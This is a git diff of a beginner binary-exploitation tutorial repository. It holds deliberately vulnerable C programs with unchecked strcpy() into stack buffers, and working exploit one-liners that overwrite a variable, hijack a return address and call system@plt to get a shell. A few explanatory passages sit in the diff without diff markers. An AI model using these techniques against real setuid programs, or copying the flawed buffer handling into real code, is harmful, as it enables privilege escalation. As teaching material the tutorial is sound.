diff --git a/README.md b/README.md
index cedb6f6..e3b2f05 100644
--- a/README.md
+++ b/README.md
@@ -1,2 +1,26 @@
-# how2exploit_binary
-An in depth tutorial on how to do binary exploitation
+### A note from the creator
+Greetings, fellow hacker, hobbyist, or computer enthusiast. If you've been
+looking for a place to start learning binary exploitation, then you're in luck.
+Written by someone who is just barely better than "incompetent," I'll be
+explaining how I learned my skills. These tutorials will be a bit long-winded,
+but hopefully they will be informative and entertaining. Please feel free to
+contact me about any clarifications that should be included in the tutorials.
+
+**This is intended for Linux. It's free if you don't already have it. Don't
+want to dual boot? Get a VM.**
+
+-Best of luck
+
+bert88sta
+
+# how2exploit_binary: get your hack on.
+
+## Introductory Tutorials:
+
+* [Intro 1: What is a binary, really?](intro-1)
+* [Intro 2: Screwing around with the stack](intro-2)
+
+## Buffer Overflows:
+
+* [1: The power of SEGFAULT](overflow-1)
+* [2: Build your own `system()`](overflow-2)
diff --git a/intro-1/README.md b/intro-1/README.md
new file mode 100644
index 0000000..0bb35b7
--- /dev/null
+++ b/intro-1/README.md
@@ -0,0 +1,83 @@
+# Intro 1: What is a binary, really?
+
+In short, a binary is what happens when you take high-level code such as C or
+C++, and compile it into something the computer can actually run. I believe in
+hands-on learning, so we can take a look inside one to really find out.
+
+Consider the file [hello_world.c](hello_world.c):
+```C
+#include <stdio.h>
+int main() {
+    printf("Hello World!\n");
+}
+```
+
+This is your average C file, more or less. It's got a main, an include, and
+a little bit of code to be run. However, your computer can't run it as is.
+In order to make it usable, we can run:
+```
+$ gcc -m32 hello_world.c -o hello_world.bin
+```
+You can ignore the `-m32` argument (you'll learn about it later), but the
+`-o hello_world.bin` simply specifies what the name of the output file is.
+
+From here, we can execute it:
+```
+$ ./hello_world.bin
+Hello World!
+```
+Unsurprisingly, we get "Hello World!" as the output. But let's go a bit deeper.
+We can open gdb (GNU Debugger) and see what's happening under the hood:
+```
+$ gdb -q ./hello_world.bin
+Reading symbols from ./hello_world.bin...(no debugging symbols found)...done.
+gdb-peda$ disas main
+Dump of assembler code for function main:
+   0x0804841d <+0>:     push   %ebp
+   0x0804841e <+1>:     mov    %esp,%ebp
+   0x08048420 <+3>:     and    $0xfffffff0,%esp
+   0x08048423 <+6>:     sub    $0x10,%esp
+   0x08048426 <+9>:     movl   $0x80484d0,(%esp)
+   0x0804842d <+16>:    call   0x80482f0 <puts@plt>
+   0x08048432 <+21>:    leave
+   0x08048433 <+22>:    ret
+End of assembler dump.
+gdb-peda$ quit
+```
+Firstly, your prompt probably looks like `(gdb)`, whereas mine is `gdb-peda$`.
+Don't worry about this; my gdb is modified.
+
+The weird stuff that gdb showed us is called assembly language. It's
+essentially the lowest-level human-readable code out there. Each line of that
+code maps one to one with a machine instruction. Let me break this down for
+you.
+
+```
+0x0804841d <+0>:     push   %ebp
+0x0804841e <+1>:     mov    %esp,%ebp
+0x08048420 <+3>:     and    $0xfffffff0,%esp
+0x08048423 <+6>:     sub    $0x10,%esp
+```
+First, the numbers you see on the left are addresses. Just like your house
+address, `0x0804841d` is where the instruction `push %ebp` lives. These
+first four instructions are the standard setup (the "prologue") for a
+function, in this case `main()`.
+
+```
+0x08048426 <+9>:     movl   $0x80484d0,(%esp)
+0x0804842d <+16>:    call   0x80482f0 <puts@plt>
+```
+
+These instructions are what actually print out our "Hello World!". The program
+moves the address of the string "Hello World!" into the memory that `%esp`
+points to. `%esp` is a register.
+It holds four bytes of information for quick
+access; `%esp` in particular holds the address of the top of the stack. Our
+program then calls `puts()`, which prints out whatever is at the address we
+supplied. (gcc swapped our `printf()` for the simpler `puts()` because the
+string has no format specifiers and ends in a newline.)
+```
+0x08048432 <+21>:    leave
+0x08048433 <+22>:    ret
+```
+
+Finally, these last two just pass control from our `main()` back to the C
+library, which does some cleaning up and then exits. We'll be learning more
+about how these binaries function in later tutorials.
diff --git a/intro-1/hello_world.bin b/intro-1/hello_world.bin
new file mode 100755
index 0000000..a46ce9e
Binary files /dev/null and b/intro-1/hello_world.bin differ
diff --git a/intro-1/hello_world.c b/intro-1/hello_world.c
new file mode 100644
index 0000000..1d159d3
--- /dev/null
+++ b/intro-1/hello_world.c
@@ -0,0 +1,5 @@
+#include <stdio.h>
+
+int main() {
+    printf("Hello World!\n");
+}
diff --git a/intro-2/README.md b/intro-2/README.md
new file mode 100644
index 0000000..6e18907
--- /dev/null
+++ b/intro-2/README.md
@@ -0,0 +1,163 @@
+# Intro 2: Screwing around with the stack.
+
+**Credit to [PicoCTF 2013](2013.picoctf.com) for the binary and source used
+here.**
+
+Now that you've gotten your feet wet with binaries, it's time to dive in
+headfirst. Consider the file [overflow1.c](overflow1-3948d17028101c40.c):
+```C
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include "dump_stack.h"
+
+void vuln(int tmp, char *str) {
+    int win = tmp;
+    char buf[64];
+    strcpy(buf, str);
+    dump_stack((void **) buf, 23, (void **) &tmp);
+    printf("win = %d\n", win);
+    if (win == 1) {
+        execl("/bin/sh", "sh", NULL);
+    } else {
+        printf("Sorry, you lose.\n");
+    }
+    exit(0);
+}
+
+int main(int argc, char **argv) {
+    if (argc != 2) {
+        printf("Usage: stack_overwrite [str]\n");
+        return 1;
+    }
+
+    uid_t euid = geteuid();
+    setresuid(euid, euid, euid);
+    vuln(0, argv[1]);
+    return 0;
+}
+```
+You can tell just by reading through it that the obvious objective here is to
+make `win == 1` a true statement, but we're going to ignore that for a few
+minutes to learn about the stack.
+The stack is a region of memory that the program
+uses to store return addresses, arguments, local variables, and all sorts of
+other goodies. For example:
+```
+$ ./overflow1-3948d17028101c40
+Usage: stack_overwrite [str]
+$ ./overflow1-3948d17028101c40 AAAA
+Stack dump:
+0xffd48bf4: 0xffd4a89b (second argument)
+0xffd48bf0: 0x00000000 (first argument)
+0xffd48bec: 0x0804870f (saved eip)
+0xffd48be8: 0xffd48c18 (saved ebp)
+0xffd48be4: 0xf7720000
+0xffd48be0: 0xf762caa7
+0xffd48bdc: 0x00000000
+0xffd48bd8: 0xffd48c44
+0xffd48bd4: 0xf7744500
+0xffd48bd0: 0xffd48c18
+0xffd48bcc: 0x00000000
+0xffd48bc8: 0x00000000
+0xffd48bc4: 0xf7720000
+0xffd48bc0: 0xffffffff
+0xffd48bbc: 0xf760b216
+0xffd48bb8: 0x000000c2
+0xffd48bb4: 0xf757f698
+0xffd48bb0: 0xf7751938
+0xffd48bac: 0xf762cad4
+0xffd48ba8: 0x000003e8
+0xffd48ba4: 0x000003e8
+0xffd48ba0: 0xffd48c00
+0xffd48b9c: 0x41414141 (beginning of buffer)
+win = 0
+Sorry, you lose.
+```
+Now if you know a thing or two about ASCII, you'll know that 0x41 is the value
+of "A". At the bottom of the stack dump, you'll notice that the beginning of
+the buffer contains 0x41414141, or our four A's. Now we can run it again, only
+this time we'll put a few more. Pay attention to the addresses on the left :)
+```
+$ ./overflow1-3948d17028101c40 $(python -c 'print "A"*76')
+Stack dump:
+0xfff577d4: 0xfff58853 (second argument)
+0xfff577d0: 0x00000000 (first argument)
+0xfff577cc: 0x0804870f (saved eip)
+0xfff577c8: 0xfff57700 (saved ebp)
+0xfff577c4: 0x41414141
+0xfff577c0: 0x41414141
+0xfff577bc: 0x41414141
+0xfff577b8: 0x41414141
+0xfff577b4: 0x41414141
+0xfff577b0: 0x41414141
+0xfff577ac: 0x41414141
+0xfff577a8: 0x41414141
+0xfff577a4: 0x41414141
+0xfff577a0: 0x41414141
+0xfff5779c: 0x41414141
+0xfff57798: 0x41414141
+0xfff57794: 0x41414141
+0xfff57790: 0x41414141
+0xfff5778c: 0x41414141
+0xfff57788: 0x41414141
+0xfff57784: 0x41414141
+0xfff57780: 0x41414141
+0xfff5777c: 0x41414141 (beginning of buffer)
+win = 1094795585
+Sorry, you lose.
+```
+This bit: `$(python -c 'print "A"*76')` just makes python print out 76 "A"s
+(the `print` statement is Python 2 syntax).
+Now you'll notice that the addresses on the left are completely different from
+the first run. This is normal. Most systems these days have ASLR enabled, a
+protection that randomizes stack addresses from run to run. However, you might
+notice that `win = 1094795585` (0x41414141 in hex) according to the program's
+output. What just happened?
+
+Back to the source:
+```C
+char buf[64];
+strcpy(buf, str);
+```
+Our buffer only holds 64 bytes. However, `strcpy()` is a dangerous function.
+The string we provide contains 76 bytes. `strcpy()` doesn't care about checking
+lengths. Instead, those extra 12 bytes that don't fit just get written past the
+end of the buffer, over whatever sits next to it on the stack. The value of
+`win` is stored right next to our buffer, so let's try to set `win = 1`. This
+is where things get a bit tricky. "1", as in the character, is 0x31. We need
+to submit 0x1, which isn't printable. Since `win` is right next to our buffer
+on the stack, we can just submit 64 "A"s, followed by one "\x01" to spill into
+the lowest byte of `win` (x86 is little-endian, so that byte comes first in
+memory).
+```
+$ ./overflow1-3948d17028101c40 $(python -c 'print "A"*64 + "\x01"')
+Stack dump:
+0xffe29f04: 0xffe2b85e (second argument)
+0xffe29f00: 0x00000000 (first argument)
+0xffe29efc: 0x0804870f (saved eip)
+0xffe29ef8: 0xffe29f28 (saved ebp)
+0xffe29ef4: 0xf7760000
+0xffe29ef0: 0xf766caa7
+0xffe29eec: 0x00000001
+0xffe29ee8: 0x41414141
+0xffe29ee4: 0x41414141
+0xffe29ee0: 0x41414141
+0xffe29edc: 0x41414141
+0xffe29ed8: 0x41414141
+0xffe29ed4: 0x41414141
+0xffe29ed0: 0x41414141
+0xffe29ecc: 0x41414141
+0xffe29ec8: 0x41414141
+0xffe29ec4: 0x41414141
+0xffe29ec0: 0x41414141
+0xffe29ebc: 0x41414141
+0xffe29eb8: 0x41414141
+0xffe29eb4: 0x41414141
+0xffe29eb0: 0x41414141
+0xffe29eac: 0x41414141 (beginning of buffer)
+win = 1
+$ ls
+overflow1-3948d17028101c40 overflow1-3948d17028101c40.c README.md
+$ exit
+```
+
+If you try this for yourself, you'll get a shell.
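To see where `win = 1094795585` came from, and why a single `\x01` byte is enough, here is a small Python 3 sketch of how a little-endian x86 machine reads those four bytes as an `int`. It assumes `win` sits directly after the 64-byte buffer, as the stack dumps suggest; the variable names are only for illustration.

```python
import struct

# ASCII "A" is 0x41, and the character "1" is 0x31, not the integer 1.
assert ord("A") == 0x41
assert ord("1") == 0x31

# Run with 76 "A"s: the four bytes that land in `win` are all 0x41.
win_after_76 = struct.unpack("<i", b"AAAA")[0]
print(win_after_76)  # 1094795585, i.e. 0x41414141

# Run with 64 "A"s + "\x01": strcpy() writes 0x01 and then its terminating
# NUL byte. The other bytes of `win` were already zero (win started as 0).
payload = b"A" * 64 + b"\x01"
win_bytes = (payload[64:] + b"\x00").ljust(4, b"\x00")
win_after_exploit = struct.unpack("<i", win_bytes)[0]
print(win_after_exploit)  # 1
```

The `"<i"` format asks `struct` for a little-endian signed 32-bit integer, which is how this 32-bit binary stores `win`.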
+You have successfully
+manipulated the stack to give you what you want.
diff --git a/intro-2/overflow1-3948d17028101c40 b/intro-2/overflow1-3948d17028101c40
new file mode 100755
index 0000000..61a465c
Binary files /dev/null and b/intro-2/overflow1-3948d17028101c40 differ
diff --git a/intro-2/overflow1-3948d17028101c40.c b/intro-2/overflow1-3948d17028101c40.c
new file mode 100644
index 0000000..ca8013f
--- /dev/null
+++ b/intro-2/overflow1-3948d17028101c40.c
@@ -0,0 +1,32 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include "dump_stack.h"
+
+void vuln(int tmp, char *str) {
+    int win = tmp;
+    char buf[64];
+    strcpy(buf, str);
+    dump_stack((void **) buf, 23, (void **) &tmp);
+    printf("win = %d\n", win);
+    if (win == 1) {
+        execl("/bin/sh", "sh", NULL);
+    } else {
+        printf("Sorry, you lose.\n");
+    }
+    exit(0);
+}
+
+int main(int argc, char **argv) {
+    if (argc != 2) {
+        printf("Usage: stack_overwrite [str]\n");
+        return 1;
+    }
+
+    uid_t euid = geteuid();
+    setresuid(euid, euid, euid);
+    vuln(0, argv[1]);
+    return 0;
+}
diff --git a/overflow-1/README.md b/overflow-1/README.md
new file mode 100644
index 0000000..9df4eed
--- /dev/null
+++ b/overflow-1/README.md
@@ -0,0 +1,97 @@
+# The power of SEGFAULT
+
+
+**Credit to [PicoCTF 2013](2013.picoctf.com) for the problem**
+
+Consider our file for this exercise [overflow2.c](overflow2.c):
+```C
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+/* This never gets called! */
+void give_shell(){
+    gid_t gid = getegid();
+    setresgid(gid, gid, gid);
+    system("/bin/sh -i");
+}
+
+void vuln(char *input){
+    char buf[16];
+    strcpy(buf, input);
+}
+
+int main(int argc, char **argv){
+    if (argc > 1)
+        vuln(argv[1]);
+    return 0;
+}
+```
+
+Looking at the code for this program, you'll see they used `strcpy()` on our
+argument. There are no size checks, so we can easily try to overflow onto the
+stack like before. You'll notice that nothing in the program ever calls
+`give_shell()`.
+Not yet at least ;)
+```
+$ ./overflow2 $(python -c 'print "A"*24')
+Segmentation fault (core dumped)
+```
+
+Segmentation fault? What's this? Simply put, a segmentation fault means
+that the program tried to access memory it isn't allowed to touch, such as an
+address that isn't mapped. Let's use `strace` to see what's really happening.
+```
+$ strace ./overflow2 $(python -c 'print "A"*32')
+...
+...
+--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} ---
+```
+The address in question is 0x41414141, our four "A"s. What does this mean?
+Consider the disassembly of the function `vuln()`, as well as `main()` where
+it's called.
+```
+$ gdb -q ./overflow2
+Reading symbols from ./overflow2...(no debugging symbols found)...done.
+gdb-peda$ disas main
+...
+   0x08048516 <+26>:    call   0x80484e2 <vuln>
+   0x0804851b <+31>:    mov    $0x0,%eax
+...
+gdb-peda$ disas vuln
+Dump of assembler code for function vuln:
+   0x080484e2 <+0>:     push   %ebp
+   0x080484e3 <+1>:     mov    %esp,%ebp
+   0x080484e5 <+3>:     sub    $0x28,%esp
+   0x080484e8 <+6>:     mov    0x8(%ebp),%eax
+   0x080484eb <+9>:     mov    %eax,0x4(%esp)
+   0x080484ef <+13>:    lea    -0x18(%ebp),%eax
+   0x080484f2 <+16>:    mov    %eax,(%esp)
+   0x080484f5 <+19>:    call   0x8048360 <strcpy@plt>
+   0x080484fa <+24>:    leave
+   0x080484fb <+25>:    ret
+End of assembler dump.
+```
+So you might remember from [Intro 2](../intro-2) that you can overwrite values
+on the stack with a `strcpy()` vulnerability. In the lines of `main()` shown
+above, control is passed to the function `vuln()`. However, `vuln()` needs to
+know where to come back to in `main()` when it finishes. This is called a
+return address. In this case, `vuln()` should jump back to 0x0804851b, the
+instruction right after `main()` calls `vuln()`. When we get a SEGFAULT at an
+address that we control, that means that we've overwritten the return address.
+What can we do with this? The possibilities are pretty much endless.
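The `vuln()` listing also tells us how far the return address sits from the start of `buf`. A minimal Python 3 sketch of that arithmetic, assuming the usual 32-bit frame layout (saved `%ebp` at `(%ebp)`, return address at `4(%ebp)`); the constant names are mine, not part of the original binary:

```python
import struct

# From the vuln() disassembly: `lea -0x18(%ebp),%eax` loads the address of buf.
BUF_OFFSET_BELOW_EBP = 0x18  # buf starts 24 bytes below the saved %ebp
SAVED_EBP_SIZE = 4           # the saved frame pointer takes 4 bytes

# The return address is stored right above the saved %ebp.
return_addr_offset = BUF_OFFSET_BELOW_EBP + SAVED_EBP_SIZE
print(return_addr_offset)  # 28

# With 32 "A"s, bytes 28..31 of our input land on the return address.
payload = b"A" * 32
overwritten = struct.unpack(
    "<I", payload[return_addr_offset:return_addr_offset + 4]
)[0]
print(hex(overwritten))  # 0x41414141, the si_addr that strace reported
```

So 28 bytes of filler reach the return address, and the next four bytes replace it.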
+You have control over the code's flow,
+so maybe we can call some other function, namely `give_shell()`:
+```
+$ objdump -d overflow2 | grep give_shell
+080484ad <give_shell>:
+```
+Now that we have the address of a useful function, let's see if we can supply
+*our own* return address. First, as you may remember from the last tutorial,
+some of these bytes aren't printable. We'll need to write the address as escape
+sequences and, because x86 is little-endian, reverse the byte order, leaving us
+with this: "\xad\x84\x04\x08". Now we can substitute it in!
+```
+$ ./overflow2 $(python -c 'print "A"*28 + "\xad\x84\x04\x08"')
+$ ls
+overflow2 overflow2.c README.md
+```
+We now have a shell!
diff --git a/overflow-1/overflow2 b/overflow-1/overflow2
new file mode 100755
index 0000000..ef77335
Binary files /dev/null and b/overflow-1/overflow2 differ
diff --git a/overflow-1/overflow2.c b/overflow-1/overflow2.c
new file mode 100644
index 0000000..e660a7e
--- /dev/null
+++ b/overflow-1/overflow2.c
@@ -0,0 +1,21 @@
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+/* This never gets called! */
+void give_shell(){
+    gid_t gid = getegid();
+    setresgid(gid, gid, gid);
+    system("/bin/sh -i");
+}
+
+void vuln(char *input){
+    char buf[16];
+    strcpy(buf, input);
+}
+
+int main(int argc, char **argv){
+    if (argc > 1)
+        vuln(argv[1]);
+    return 0;
+}
diff --git a/overflow-2/README.md b/overflow-2/README.md
new file mode 100644
index 0000000..114b3e4
--- /dev/null
+++ b/overflow-2/README.md
@@ -0,0 +1,106 @@
+# Build your own `system()`
+
+Well, life is tough. Unlike in the first overflow exercise, I've made this one
+so that you can't just call a specific function and get a shell. However, we'll
+try to solve it anyway.
+
+```C
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+int main(int argc, char **argv) {
+    if (argc>1) {
+        gid_t gid = getegid();
+        setresgid(gid, gid, gid);
+        printf("Good thing you don't have /bin/sh");
+        printf("\nGood luck getting a shell.\n");
+        system("echo You Lose!\n");
+        char buf[24];
+        strcpy(buf,argv[1]);
+    }
+    return 0;
+}
+```
+
+Now unlike the last problem, you might notice that there is no call to
+`system("/bin/sh")`. This means we're going to have to be a bit more clever.
+
+Let's take a look at the disassembly to learn a bit more about `system()`:
+```
+$ gdb -q ./overflow
+Reading symbols from ./overflow...(no debugging symbols found)...done.
+gdb-peda$ disas main
+Dump of assembler code for function main:
+...
+   0x0804853c <+47>:    call   0x8048400 <setresgid@plt>
+   0x08048541 <+52>:    movl   $0x8048620,(%esp)
+   0x08048548 <+59>:    call   0x8048390 <printf@plt>
+   0x0804854d <+64>:    movl   $0x8048642,(%esp)
+   0x08048554 <+71>:    call   0x80483c0 <puts@plt>
+   0x08048559 <+76>:    movl   $0x804865e,(%esp)
+   0x08048560 <+83>:    call   0x80483d0 <system@plt>
+```
+Now what is `system@plt`? This is a crucial part. This binary is dynamically
+linked. This means that the binary makes calls to an actual libc file that gets
+loaded into memory. Luckily for us, dynamically linked binaries have PLT stubs.
+Since ASLR randomizes libc addresses as well, the binary needs some way to
+reliably call the functions it uses. Each PLT stub is a small wrapper that
+jumps to the actual code in libc. **The PLT is a part of the binary, so its
+address doesn't change.** If you call `system@plt`, you'll call `system()`. So
+how are we going to find it? Since the PLT is a part of the binary, we'll use
+objdump:
+```
+$ objdump -d overflow | grep system
+080483d0 <system@plt>:
+ 8048560: e8 6b fe ff ff call 80483d0 <system@plt>
+```
+
+Now let's try to break the binary.
+```
+$ strace ./overflow $(python -c 'print "A"*44')
+...
+--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} ---
+```
+We get control of `$eip` after 40 bytes. `$eip` is the instruction pointer
+register.
+This is the same as overwriting a return address. It simply means that
+we have control over the control flow. Now let's supply our address.
+```
+$ ./overflow $(python -c 'print "A"*40 + "\xd0\x83\x04\x08"')
+Good thing you don't have /bin/sh
+Good luck getting a shell.
+You Lose!
+sh: 1: ������: not found
+Segmentation fault (core dumped)
+```
+Now this is really weird. What happened here is that we called `system()`.
+We didn't provide any arguments for `system()` so it just pulled some junk from
+the stack. On 32-bit x86, `system()` expects to find its own return address on
+the stack, followed by its argument, so calling a function in an exploit has
+to take this form:
+
+\[address of function\] \[return address\] \[argument\]
+
+Now when the programmer wrote this (I wrote this one :P), he thought he could
+be smart and make fun of you for not having a "/bin/sh" string. However, he
+didn't realize that by including that string in the code, the string is in the
+binary. We can use gdb to find the string!
+
+```
+$ gdb -q ./overflow
+Reading symbols from overflow...(no debugging symbols found)...done.
+gdb-peda$ b *main
+Breakpoint 1 at 0x804850d
+gdb-peda$ r
+Breakpoint 1, 0x0804850d in main ()
+gdb-peda$ find /bin/sh
+Searching for '/bin/sh' in: None ranges
+Found 3 results, display max 3 items:
+overflow : 0x804863a ("/bin/sh")
+overflow : 0x804963a ("/bin/sh")
+    libc : 0xf7f82a24 ("/bin/sh")
+```
+
+Now you'll notice that two of these are in the binary. I'll just pick the first
+one and run with it.
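Before assembling the one-liner, the \[address of function\] \[return address\] \[argument\] layout can be sketched byte by byte. This is a minimal Python 3 illustration, assuming the addresses from the objdump and gdb output above; `p32` is a hypothetical helper name, not something the tutorial's binary or gdb provides.

```python
import struct

# Values taken from the objdump and gdb output shown earlier.
SYSTEM_PLT = 0x080483D0  # address of system@plt
BIN_SH = 0x0804863A      # first "/bin/sh" hit inside the binary
EIP_OFFSET = 40          # bytes of filler before the saved return address


def p32(value):
    """Pack a 32-bit value as little-endian bytes (illustrative helper)."""
    return struct.pack("<I", value)


payload = (
    b"A" * EIP_OFFSET    # filler up to the return address
    + p32(SYSTEM_PLT)    # [address of function]
    + b"FAKE"            # [return address] system() would return to (junk)
    + p32(BIN_SH)        # [argument] pointer to "/bin/sh"
)
print(payload)
```

Note that in Python 3, `print` would re-encode bytes such as `\xd0` as UTF-8, so the raw payload would have to be written with `sys.stdout.buffer.write(payload)` rather than `print`; the tutorial's one-liners rely on Python 2 behaviour.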
+Finally, our finished exploit looks like so:
+```
+$ ./overflow $(python -c 'print "A"*40 + "\xd0\x83\x04\x08" + "FAKE" + "\x3a\x86\x04\x08"')
+```
diff --git a/overflow-2/overflow b/overflow-2/overflow
new file mode 100755
index 0000000..59825b7
Binary files /dev/null and b/overflow-2/overflow differ
diff --git a/overflow-2/overflow.c b/overflow-2/overflow.c
new file mode 100644
index 0000000..b827986
--- /dev/null
+++ b/overflow-2/overflow.c
@@ -0,0 +1,19 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+int main(int argc, char **argv) {
+    if (argc>1) {
+        gid_t gid = getegid();
+        setresgid(gid, gid, gid);
+        printf("Good thing you don't have /bin/sh");
+        printf("\nGood luck getting a shell.\n");
+        system("echo You Lose!\n");
+        char buf[24];
+        strcpy(buf,argv[1]);
+        return 0;
+    }
+    else {
+        return 0;
+    }
+}